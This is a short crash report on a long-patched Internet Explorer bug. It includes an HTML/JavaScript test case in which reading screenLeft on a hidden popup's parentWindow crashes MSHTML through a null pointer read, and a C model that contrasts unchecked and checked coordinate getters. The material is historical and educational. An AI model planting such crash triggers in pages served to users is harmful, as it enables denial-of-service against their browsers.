A brief crash report. Reading the screenLeft property on a hidden createPopup’s parentWindow caused a null pointer dereference in MSHTML!CInPlace::ClientToScreen.

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE10" />
<title>DoS_createPopUp_screenLeft</title>
</head>
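<body onload="main()">
<script language="JavaScript">
// main() runs once the page has loaded.
function main()
{
	// createPopup() returns a popup that has not been shown yet; reading
	// screenLeft on its parentWindow is the property access that crashed.
	createPopup().document.parentWindow.screenLeft;
}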
</script>
</body>
</html>

The crash was classified as PROBABLY_NOT_EXPLOITABLE — a null-class pointer read in MSHTML!CInPlace::ClientToScreen+0x5. The popup had no in-place client object because it had never been shown, so the coordinate-translation function dereferenced a null pointer when attempting to convert client coordinates to screen coordinates.
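The same pattern as a small C model, added here as an illustration and not taken from MSHTML or from the original report: an object whose in-place state exists only after it is shown, with an unchecked coordinate getter beside a checked one. All type and function names (PopupWindow, InPlace, screen_left_checked, E_NOT_SHOWN) are hypothetical.

```c
#include <stdio.h>
#include <stdlib.h>

/* Hypothetical model; these are not MSHTML's real types or functions. */
typedef struct { int origin_x, origin_y; } InPlace;  /* exists only once shown */
typedef struct { InPlace *in_place; } PopupWindow;

#define E_NOT_SHOWN (-1)

/* A popup is created hidden, so it has no in-place object yet. */
PopupWindow popup_create(void) { PopupWindow w = { NULL }; return w; }

/* Showing the popup is what allocates the in-place state. */
int popup_show(PopupWindow *w, int x, int y) {
    if (!w->in_place) {
        w->in_place = malloc(sizeof *w->in_place);
        if (!w->in_place) return E_NOT_SHOWN;
    }
    w->in_place->origin_x = x;
    w->in_place->origin_y = y;
    return 0;
}

void popup_destroy(PopupWindow *w) { free(w->in_place); w->in_place = NULL; }

/* Before: assumes in_place is valid. On a hidden popup this reads a field
   at a small offset from address 0, i.e. a null-class pointer read. */
int screen_left_unchecked(const PopupWindow *w, int client_x) {
    return w->in_place->origin_x + client_x;
}

/* After: check object state first and report an error instead of faulting. */
int screen_left_checked(const PopupWindow *w, int client_x, int *out) {
    if (!w || !w->in_place || !out) return E_NOT_SHOWN;
    *out = w->in_place->origin_x + client_x;
    return 0;
}

int main(void) {
    PopupWindow w = popup_create();
    int left = 0;
    int rc = screen_left_checked(&w, 0, &left);   /* hidden popup */
    printf("hidden: rc=%d\n", rc);
    popup_show(&w, 120, 80);                      /* constructed sample position */
    rc = screen_left_checked(&w, 5, &left);
    printf("shown:  rc=%d left=%d\n", rc, left);
    popup_destroy(&w);
    return 0;
}
```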

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.